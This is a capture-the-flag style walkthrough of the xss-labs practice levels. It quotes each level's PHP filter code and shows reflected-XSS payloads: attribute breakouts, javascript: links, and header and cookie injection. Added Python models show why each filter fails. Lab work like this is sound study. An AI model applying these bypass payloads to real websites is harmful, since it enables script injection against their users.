XSS labs clearance challenge

0x00 xss-labs

I have been looking at XSS recently, so today I work through the xss-labs challenges. It took a while to find the source code; since everyone knows how slow GitHub downloads can be, I mirrored it to Gitee. Feel free to download it from there:

  Source code: https://gitee.com/ruoli-s/xss-labs

Installation needs no explanation: drop the folder into the www directory of your PHP web server and open it in the browser. xss-labs has 20 levels, so let's get started.

  (Honestly, the pictures on each level are the main reason I wanted to do this challenge.)


0x01 level 1 no filtering mechanism

The first thing to notice is that the parameter is carried in the URL query string.

Changing the parameter changes the page. Right-click to view the source: there is a small script that jumps to level 2 once alert() fires, and the page reports the length of the value we passed in. Nothing we send is modified on the way into the HTML.

With no filtering at all, a plain <script> tag containing alert() in the parameter pops the dialog and the level is passed.



0x02 level 2 closing the tag

Submitting the level 1 payload shows it echoed back as text, so the output has been entity-escaped somewhere.

Press F12 and look at the front-end code:

The payload appears twice: the first copy, displayed on the page, is escaped; the second sits inside the value attribute of the search box, where it is echoed raw. That is the place to attack. We construct a payload that starts with "> to close the input tag, so whatever follows is parsed as a new tag:



0x03 level 3 single-quote closure + htmlspecialchars()

On level 3 we first re-test the payloads from the previous two levels:

Everything is entity-escaped. Look at the source:

  echo "<h2 align=center>No results found related to ".htmlspecialchars($str).".</h2>"."<center>
  <form action=level3.php method=GET>
  <input name=keyword value='".htmlspecialchars($str)."'>
  <input type=submit name=submit value=search />
  </form>
  </center>";

So double quotes are restricted, but single quotes get through: with its default flags htmlspecialchars() encodes <, >, & and ", and leaves ' alone. Since the value attribute of the input is wrapped in single quotes, we can close it with ' and append an HTML event attribute, which needs no angle brackets at all. We build the payload accordingly:

The alert does not fire on submission: the event attribute only runs when the mouse is moved over the text box.

See also: PHP's htmlspecialchars() function and the HTML event attributes reference.

0x04 level 4 double-quote closure + event attribute

As before, we run through the previous tests one by one; as expected they all fail. Look at the front-end code:

The page has stripped > and <. Let's look at the back-end code:

  $str2=str_replace(">","",$str);
  $str3=str_replace("<","",$str2);
  echo "<h2 align=center>No results found related to ".htmlspecialchars($str).".</h2>".'<center>
  <form action=level4.php method=GET>
  <input name=keyword value="'.$str3.'">

So str_replace() removes the angle brackets, and this time the value attribute is wrapped in double quotes, which are not escaped on the way into the input. We copy the approach from the previous level: close the attribute with " and add an HTML event attribute:

This passes the level as well.
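To make the difference between the two contexts concrete, here is an added Python model of the level 3 and level 4 output (example code written for this write-up, not code from xss-labs, whose source is PHP). It mimics PHP's htmlspecialchars() with its default flags, which encode <, >, & and " but not the single quote, renders the same <input> tags the two levels do, and parses the result with Python's own HTML parser to see which attributes a browser would end up with. The two payload strings are assumed; the ent_quotes switch shows why passing ENT_QUOTES to htmlspecialchars() closes the level 3 hole, and why level 4's bracket stripping does nothing against an attribute-context payload.

```python
from html.parser import HTMLParser


def htmlspecialchars(s, ent_quotes=False):
    """PHP htmlspecialchars(). With the default flags (ENT_COMPAT) the single
    quote is left untouched; ENT_QUOTES is what closes the level 3 hole."""
    out = (s.replace("&", "&amp;").replace("<", "&lt;")
            .replace(">", "&gt;").replace('"', "&quot;"))
    if ent_quotes:
        out = out.replace("'", "&#039;")
    return out


def level3(keyword, ent_quotes=False):
    """Level 3 context: the reflected value sits in a single-quoted attribute
    and goes through htmlspecialchars()."""
    return "<input name=keyword value='" + htmlspecialchars(keyword, ent_quotes) + "'>"


def level4(keyword):
    """Level 4 context: double-quoted attribute, but the value only has < and >
    stripped, so the quote itself passes through untouched."""
    stripped = keyword.replace(">", "").replace("<", "")
    return '<input name=keyword value="' + stripped + '">'


class _InputAttrs(HTMLParser):
    """Collects the attributes of the first <input> tag the way a browser would."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)


def input_attrs(markup):
    """Attribute dict of the rendered <input>; attribute values are already
    entity-decoded, exactly what the browser works with."""
    parser = _InputAttrs()
    parser.feed(markup)
    return parser.attrs or {}


def has_event_handler(markup):
    """True if an on* attribute ended up as a real attribute of the tag rather
    than as text inside the value string."""
    return any(name.startswith("on") for name in input_attrs(markup))


if __name__ == "__main__":
    # Payloads assumed for this demo: close the quote, add a mouse event.
    for markup in (level3("' onmouseover='alert(1)"),
                   level3("' onmouseover='alert(1)", ent_quotes=True),
                   level4('" onmouseover="alert(1)')):
        print(has_event_handler(markup), markup)
```

The parser result is the check that matters: with the default flags the single-quoted value on level 3 ends early and onmouseover becomes an attribute; with ENT_QUOTES the whole payload stays inside value. Level 4 never touches the double quote, so the same trick works there without any angle bracket.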

0x05 level 5 JavaScript pseudo-protocol

Level 5. Testing in the previous way fails, as expected, but it reveals a few things:

It looks like on has been tampered with. Typing o followed by other characters confirms that only the exact sequence on is rewritten, which means event attributes are out.

Trying further, <script has also been replaced, with <scr_ipt.

Everyone has probably thought of it by now: let's try mixed case:

That is rewritten too, so the filter is case-insensitive.

Next we check what can be used to close the attribute. Entering ', ", <, > and \ shows that only the single quote is entity-escaped, so " can be used to build the closure:

We have now tried everything that should be tried. Next, the JavaScript pseudo-protocol:

  For an introduction to the JavaScript pseudo-protocol see https://www.html.cn/qa/javascript/11155.html

  "><a href=javascript:alert(/xss/)>

The link is injected and clicking it pops the alert, so the level is passed. It is more useful to read the source, though:

  ini_set("display_errors", 0);
  $str = strtolower($_GET["keyword"]);
  $str2=str_replace("<script","<scr_ipt",$str);
  $str3=str_replace("on","o_n",$str2);
  echo "<h2 align=center>No results found related to ".htmlspecialchars($str).".</h2>".'<center>
  <form action=level5.php method=GET>
  <input name=keyword value="'.$str3.'">
  <input type=submit name=submit value=search />

As guessed: on and <script are each rewritten by str_replace(), and strtolower() folds the input to lowercase first, which is why the mixed-case attempt failed. On to the next level.

0x06 level 6 case bypass

We have reached level 6 and keep going:

Testing the previous payloads directly does not work, of course. Looking at the front-end code: this time even href has been filtered. Ruthless.

We also test on and <script, which are filtered just as plainly, and the single quote ' is again entity-escaped. But we notice something else: the filter seems to care about case this time, because mixed case is left untouched.

So we close the attribute with "> and write the filtered keyword in mixed case (for example HREF):

This passes the level as well. On we go!

0x07 level 7 double-write bypass

Level 7. Nice picture on this one, almost magical. Do you have it?

No more nonsense, let's start testing. It is still useful to see what comes back.

The keyword script is filtered, and the filter deletes the keyword rather than rewriting it. Isn't that exactly the case for double writing? Deleting script once from scrscriptipt leaves script behind. We close the attribute with " and construct the payload the same way:

Easy. Next.
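The three bypasses on levels 5, 6 and 7 fall straight out of how each str_replace() chain is built. Here is an added Python model of the three filters (written for this write-up, not the lab's PHP); the replacement tables are assumed from the descriptions above, with href included for levels 6 and 7 because the level 6 notes mention it. Level 5 lowercases and rewrites on and <script, so a javascript: URL in an href contains neither token; level 6 rewrites the same way but without strtolower(), so mixed case slips past a case-sensitive replace; level 7 deletes the keywords in one non-recursive pass, so writing a keyword twice leaves one copy behind.

```python
def php_filter(s, rules, lowercase):
    """Chain of PHP str_replace() calls: each rule is a single, non-recursive
    pass over the string, which is exactly what str.replace does."""
    if lowercase:
        s = s.lower()
    for old, new in rules:
        s = s.replace(old, new)
    return s


# Replacement tables assumed from the level descriptions above.
LEVEL5 = [("<script", "<scr_ipt"), ("on", "o_n")]                      # rewrite, after strtolower()
LEVEL6 = [("<script", "<scr_ipt"), ("on", "o_n"), ("href", "hr_ef")]   # rewrite, case-sensitive
LEVEL7 = [("script", ""), ("on", ""), ("href", "")]                    # delete, after strtolower()


def level5(keyword):
    return php_filter(keyword, LEVEL5, lowercase=True)


def level6(keyword):
    return php_filter(keyword, LEVEL6, lowercase=False)


def level7(keyword):
    return php_filter(keyword, LEVEL7, lowercase=True)


def survives(filtered, payload):
    """True if the filter returned the payload unchanged."""
    return filtered == payload


if __name__ == "__main__":
    # Payload strings are assumed; they follow the approach of each level.
    for name, fn, payload in [
        ("level5 event attribute", level5, '" onmouseover=alert(1)'),
        ("level5 pseudo-protocol", level5, '"><a href=javascript:alert(/xss/)>'),
        ("level6 lowercase href", level6, '"><a href=javascript:alert(1)>'),
        ("level6 mixed case", level6, '"><a HREF=javascript:alert(1)>'),
        ("level7 plain script", level7, '"><script>alert(1)</script>'),
        ("level7 double write", level7, '"><scrscriptipt>alert(1)</scrscriptipt>'),
        ("level7 double write on", level7, '" oonnmouseover=alert(1)'),
    ]:
        print(f"{name:24} {survives(fn(payload), payload)!s:6} {fn(payload)}")
```

The last case is worth noting: because str_replace() is not applied repeatedly, oonn collapses to on after one deletion, so the double-write trick works for any deleted keyword, not just script.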

0x08 level 8 encoding bypass

Level 8, nothing special at first glance.

Testing the payloads shows that everything tried so far is basically filtered, and mixed case is stuck as well. However, the front-end code builds a link directly from our input (it lands in the href of an <a> tag), so we might as well try encoding and see whether that gets past the filter:

I tested both HTML entity (decimal) encoding and hex encoding; both bypass the filter. I'll only show the hex form here, since most blogs show the decimal form; those not familiar with it can look it up.

The filter rewrites the ri in script to r_i (script becomes scr_ipt), so we only need to encode r or i and try:

  letter   decimal   hex
  r        &#114;    &#x72;
  i        &#105;    &#x69;

Construct the payload (javascript: with the r or i written as a character reference):

Well done, next level.

0x09 level 9 keyword detection

The more I look at these pictures, the more I like them. As usual, let's make some noise first.

I've tried everything that should be tried. What does this code give back? Where did the payload we entered go?

Wait, let me check the source:

  if(false===strpos($str7,'http://'))
  {
      echo '<a href="Links">Links</a>';
  }
  else
  {
      echo '<a href="'.$str7.'">Links</a>';
  }

The strpos() check: the string we enter must contain http://, otherwise the link is replaced by a dead placeholder. Who would think of that?

Encoding is not filtered here, so we keep the payload of the previous level and append http:// to it; the check only looks for the substring, so it just has to appear somewhere without breaking the JavaScript:

Cough, this level is cruel. Next.
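Why the character-reference trick works on levels 8 and 9, as an added Python model (not the lab's code; the rewrite rules are assumed from the level 8 description, the level 9 gate is the strpos() check shown above). Browsers decode numeric character references in attribute values when they parse the HTML, before the href is ever treated as a URL, so writing one letter of javascript as &#x69; (or &#105;) leaves nothing for str_replace() to match while the browser still ends up with a javascript: scheme. For level 9 the payload also needs the literal substring http://; placing it after // inside the JavaScript (an assumption here; it is a line comment as far as the script is concerned) satisfies the check without breaking the code.

```python
import html
from urllib.parse import urlsplit

# Rewrite rules assumed from the level 8 description (strtolower() first).
LEVEL8_RULES = [("script", "scr_ipt"), ("on", "o_n"), ('"', "&quot;")]


def _filter(keyword):
    s = keyword.lower()
    for old, new in LEVEL8_RULES:
        s = s.replace(old, new)
    return s


def level8(keyword):
    """Level 8: the filtered value is written straight into href="..."."""
    return '<a href="' + _filter(keyword) + '">Links</a>'


def level9(keyword):
    """Level 9: same filter, plus the strpos($str, 'http://') gate."""
    s = _filter(keyword)
    if "http://" not in s:            # PHP: false === strpos($str7, 'http://')
        return '<a href="Links">Links</a>'
    return '<a href="' + s + '">Links</a>'


def browser_href(anchor):
    """What the browser navigates to: the href value with character references
    decoded, which the HTML parser does before the URL is ever looked at."""
    start = anchor.index('href="') + len('href="')
    end = anchor.index('"', start)
    return html.unescape(anchor[start:end])


def scheme_of(anchor):
    """URL scheme the browser would see for the rendered link."""
    return urlsplit(browser_href(anchor)).scheme


def char_ref(letter, hex_form=True):
    """Numeric character reference for one letter, e.g. i -> &#x69; or &#105;."""
    return "&#x%x;" % ord(letter) if hex_form else "&#%d;" % ord(letter)


if __name__ == "__main__":
    plain = "javascript:alert(1)"
    encoded = "javascr" + char_ref("i") + "pt:alert(1)"
    print(level8(plain), "->", browser_href(level8(plain)))
    print(level8(encoded), "->", browser_href(level8(encoded)))
    print(level9(encoded), "->", browser_href(level9(encoded)))
    print(level9(encoded + "//http://"), "->", browser_href(level9(encoded + "//http://")))
```

The filter sees javascr&#x69;pt and finds no script in it; the browser decodes the reference and sees javascript:alert(1). On level 9 the same string is rejected until http:// is present, and with it tucked behind // the scheme is still javascript.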

0x10 level 10 hidden information

After a thousand hardships we have reached the halfway point of the challenge.

Again I tried everything; why does the parameter just run off into the URL again? The page shows nothing, but what is that form in the source, and why is nothing displayed on the page?

No way around it, look at the source:

  $str11 = $_GET["t_sort"];
  $str22=str_replace(">","",$str11);
  $str33=str_replace("<","",$str22);
  echo "<h2 align=center>No results found related to ".htmlspecialchars($str).".</h2>".'<center>
  <form id=search>
  ...
  <input name="t_sort"  value="'.$str33.'" type="hidden">
  </form>

Did you spot it? The keyword parameter is just a puzzle; what really matters is the t_sort parameter. The catch is that its input has type hidden, so we have to turn it into a text input in the front end to make it appear. The back end only filters <>, so we can use an event attribute: close the value with ", set the type to text and add a click handler:

Note: the type has to be changed in the front end both times for the pop-up window to appear.

0x11 level 11 Referer

Level 11. After level 10 it is basically impossible for things to be this simple again, so rather than guess and waste time we go straight to the front-end code. Nothing usable there; on to the source.

As on level 10 there are hidden inputs, with one more parameter, t_ref; we don't yet know how it is passed. First try the method of the previous level, starting from the tag.

Construct the payload:

View the page code:

t_sort still accepts the parameter. Let's look at the source directly!

  $str11=$_SERVER['HTTP_REFERER'];
  $str22=str_replace(">","",$str11);
  $str33=str_replace("<","",$str22);
  ...
  <input name="t_ref"  value="'.$str33.'" type="hidden">

There is one more field, $str11=$_SERVER['HTTP_REFERER'], and HTTP_REFERER is the Referer header of the HTTP request, that is, the page we came from. We can set the Referer field with HackBar.

Checking the page code, the Referer value we passed ends up in t_ref.

Next we construct the payload and break in through the Referer: close the value, make the input visible and add a click handler:

  Referer: " type="text" onclick="alert(/xss/)

View the page code:

Finally, click the text box:

0x12 level 12 User-Agent

It keeps getting harder; even the picture has started crying.

Let's just look at the page code:

Does the value that gets reflected this time look familiar? If not, compare it with the request headers:

It is identical to the User-Agent. So the idea is clear: we start from the User-Agent header and construct the payload:

  User-Agent: " type="text" onclick="alert(/xss/)

Finally, check the page code:

OK, this one is passed directly as well.



0x13 level 13 Cookie

On level 13 we don't know where to start, so we go straight to the page code:

Another parameter has been added, t_cook, which is presumably a cookie. Let's try the payload directly:

  Cookie: " type="text" onclick="alert(/xss/)

The Cookie field we added in HackBar was not passed in successfully.

So we have to capture the request and look; time to dust off Burp Suite. Capturing the request shows one more parameter, user: the cookie value is read from the user cookie. Helpless.

Now that we know which parameter the value is passed through, we construct the payload:

  Cookie: user=" type="text" onclick="alert(/xss/)

In Repeater we can see that the parameter has been passed in; forward the request and collect the result.

OK, level 13 passed smoothly. Continue.
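Levels 10 to 13 are one bug reached from four sources. Here is an added Python simulation (written for this write-up, not the lab's PHP) that routes a request's query string, Referer, User-Agent or user cookie into the hidden input each level emits and checks what a browser would keep. The hidden-field names t_sort, t_ref and t_cook and the user cookie follow the write-up; t_ua for level 12 and the payload string are assumed. One detail matters for the payload: browsers keep the first occurrence of a duplicated attribute, so the injected type="text" wins over the template's trailing type="hidden", which is what makes the box appear.

```python
import re

# level -> (hidden input name, request section, key within that section)
# t_ua for level 12 is assumed; the other names follow the write-up.
SOURCES = {
    10: ("t_sort", "query", "t_sort"),
    11: ("t_ref", "headers", "Referer"),
    12: ("t_ua", "headers", "User-Agent"),
    13: ("t_cook", "cookies", "user"),
}

# Assumed payload: closes value, makes the box visible, adds a click handler.
PAYLOAD = '" type="text" onclick="alert(1)'


def strip_angles(s):
    """The only filtering these levels apply: str_replace() of > and <."""
    return s.replace(">", "").replace("<", "")


def request(level, payload):
    """Constructed request carrying the payload where the level reads it."""
    _, section, key = SOURCES[level]
    req = {"query": {}, "headers": {}, "cookies": {}}
    req[section][key] = payload
    return req


def render(level, req):
    """The hidden <input> the page emits for the given level and request."""
    name, section, key = SOURCES[level]
    value = strip_angles(req[section].get(key, ""))
    return '<input name="%s" value="%s" type="hidden">' % (name, value)


def effective_attrs(tag):
    """Attributes the browser keeps: when an attribute is repeated, the first
    occurrence wins, so an injected type="text" beats the trailing type="hidden".
    (Small tokenizer; this template only uses double-quoted attributes.)"""
    attrs = {}
    for name, value in re.findall(r'(\w+)="([^"]*)"', tag):
        attrs.setdefault(name, value)
    return attrs


def is_visible_and_clickable(tag):
    """The condition the write-up relies on: a text box with a click handler."""
    a = effective_attrs(tag)
    return a.get("type") == "text" and "onclick" in a


if __name__ == "__main__":
    for level in (10, 11, 12, 13):
        tag = render(level, request(level, PAYLOAD))
        print(level, is_visible_and_clickable(tag), tag)
```

Stripping < and > stops a new tag from being opened, which is why every level in this group is beaten from inside the attribute instead; whether the value arrives in the query string, a header or a cookie makes no difference to the template.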

0x14 level 14 Exif

What is this? Where is the picture? It seems to redirect, and the page it redirects to never finishes loading for me (the key problem is that I cannot get a proxy up, so I resolutely gave up and looked at the answer).

Searching around, this level is about Exif XSS. I only know Exif from CTF misc steganography, where information is hidden in the Exif data of an image (not that I have ever met such an easy steganography problem); the rest came from Baidu.

That's it for this level.

0x15 level 15 ng-include

At first I looked around and found nothing. Eventually I noticed that the parameter in the URL is reflected into the page source, so there must be something going on there.

Looking at the page source again, there is indeed an ng-include, which I had never seen before.

Baidu says ng-include is an AngularJS directive. I don't know much about AngularJS, but it seems similar to PHP's include: it includes a file.

So let's look at how ng-include is used:

1. The ng-include directive is used to include external HTML files.

2. The included content becomes a child node of the specified element.

3. The value of the ng-include attribute is an expression that returns a file name.

4. By default, the included file has to be served from the same domain.

Worth noting:

  1. ng-include: if you give a literal address, it must be wrapped in quotes (the value is an expression, not a path).

  2. ng-include: the external HTML is loaded, but the content of any <script> tag in it is not executed.

  3. ng-include: a <style> tag in the external HTML is loaded and the styles are applied.

Look at the source again:

  <script>
  window.alert = function()
  {
      confirm("well done!");
  }
  </script>

  Welcome to level 15

  Welcome to level 15. Find a way to go out!

  $str = $_GET["src"];
  echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';

The parameter is passed through src and is escaped, so < and > cannot be used directly. But since an HTML file can be included here, one of the pages we have already exploited can be included too; as the notes above say, a <script> inside the included page will not run, while an event attribute on a tag in it will. So we include an earlier level whose parameter carries an event-attribute payload, for example level 1, whose parameter is not filtered at all:

OK, the window pops up successfully. The next two levels are the ones that make people uncomfortable.

0x16 level 16 space entity escape

Testing shows the parameter is passed in the URL. Let's try the simplest way first:

The word script is filtered directly, and even /script is taken out, so try a payload without it:

Er, now the space has been replaced by an entity:

So we need something other than a space to separate the attributes. The first thing that comes to mind is a line break: in HTML a newline is whitespace and can stand in for a space between attributes.

URL-encode the line break as %0a and substitute it for every space:

OK, the pop-up appears.

By the way, look at the source: sure enough, all of them are replaced with the &nbsp; entity.
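An added Python model of the level 16 filter (not the lab's code; the replacement set is assumed from the description above, as is the img/onerror payload shape). It shows why %0a works: the filter turns every space into the &nbsp; entity, which is ordinary text to the HTML parser, while a newline is HTML whitespace just like a space, so attributes separated by newlines still parse as attributes.

```python
import re
from urllib.parse import unquote


def level16(keyword):
    """Assumed filter: lowercase, then space, slash and the word script each
    become the &nbsp; entity (an entity is not whitespace to the HTML parser)."""
    s = keyword.lower()
    for old in ("script", " ", "/"):
        s = s.replace(old, "&nbsp;")
    return "<center>" + s + "</center>"


# A tag name followed by HTML whitespace (\s covers space, tab, LF, CR, FF),
# then an on* attribute somewhere before the closing >.
_TAG_WITH_HANDLER = re.compile(r"<(\w+)\s[^>]*\bon\w+\s*=")


def handler_tag(markup):
    """Name of the first tag that still carries an event attribute, else None."""
    m = _TAG_WITH_HANDLER.search(markup)
    return m.group(1) if m else None


def url_payload(tag_source):
    """Replace every space with %0a so the separator survives the filter."""
    return tag_source.replace(" ", "%0a")


if __name__ == "__main__":
    blocked = "<img src=x onerror=alert(1)>"              # assumed payload shape
    print(handler_tag(level16(blocked)), level16(blocked))
    allowed = unquote(url_payload(blocked))               # what PHP sees after URL decoding
    print(handler_tag(level16(allowed)), repr(level16(allowed)))
```

Tab (%09) and carriage return (%0d) are HTML whitespace as well and would serve the same purpose; the point is that the filter enumerates one separator and the parser accepts several.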


0x17 level 17 parameter splicing

Emmm, no picture again. I casually passed a few parameters and found that the page accepts two, arg01 and arg02, and splices them together after they are passed. Can we trigger an event directly from there?

Er, nothing seems to happen, yet the page code shows the event attribute is in place. Strange.

I asked Baidu: the page loads an swf (Flash) object, and unfortunately our Firefox will not render it at all. Switched to Chrome: Flash is blocked there, but the pop-up still comes out:

Switched browser once more (Star Wish), and the object finally shows up.

By the way, look at the source. It is just as we thought: the two arg parameters are spliced into the embed tag, with < and > filtered.

0x18 level 18 parameter splicing

Er, at first I thought there was no picture again, but the page code shows another swf, so I switched browsers right away.

Poof, what is this? The animation is not what I expected,

Use the payload of the previous level directly:

Poof poof, and that works. Is this level just playing with us? I don't get it, let's go!!
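The reason levels 17 and 18 are still injectable despite htmlspecialchars(): the two arguments are spliced into an unquoted src attribute. The added Python model below (written for this write-up, not the lab's PHP; the template and the event name are assumed) shows that a space in arg02 ends the attribute, everything after it becomes further attributes of the <embed>, and quoting the attribute in the template is the fix.

```python
import re


def htmlspecialchars(s):
    """PHP htmlspecialchars() with default flags: & < > and " only; spaces
    and = pass straight through."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def level17(arg01, arg02, quoted=False):
    """Assumed template: both arguments escaped, then spliced into the src
    attribute of an <embed>. quoted=True is the hardened version."""
    src = "xsf01.swf?" + htmlspecialchars(arg01) + "=" + htmlspecialchars(arg02)
    if quoted:
        src = '"' + src + '"'
    return "<embed src=" + src + " width=100% height=100%>"


# name=value pairs as the HTML parser tokenizes them: a quoted value runs to
# the closing quote, an unquoted one ends at the first whitespace or >.
_ATTR = re.compile(r'(\w+)=("[^"]*"|[^\s>]*)')


def embed_attrs(markup):
    """Attribute dict of the rendered tag (first occurrence of a name wins)."""
    attrs = {}
    for name, value in _ATTR.findall(markup):
        attrs.setdefault(name, value.strip('"'))
    return attrs


if __name__ == "__main__":
    payload = "b onmouseover=alert(1)"                     # assumed event name
    for quoted in (False, True):
        markup = level17("a", payload, quoted=quoted)
        print(markup)
        print("  ->", embed_attrs(markup))
    print(level17("a", "<script>alert(1)</script>"))      # brackets are escaped
```

Escaping only protects against leaving the attribute through a quote; when there is no quote to leave, plain whitespace does the job, which is why attribute values should always be quoted regardless of how they are escaped.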


0x19 level 19 Flash XSS

First try the payload: it looks like " should close the attribute, but the closure fails because htmlspecialchars() is applied here and the quote is escaped.

I couldn't help it and looked at the answer: it involves decompiling the Flash file (swf). I don't understand it yet; if you are interested, have a look. I cannot chew through it at the moment; when the time is right I'll write it up separately. For now I only paste the answer.

0x20 level 20 Flash XSS

This one should be Flash as well. I paste the answer first; the details will have to wait until I can calm down and work through it.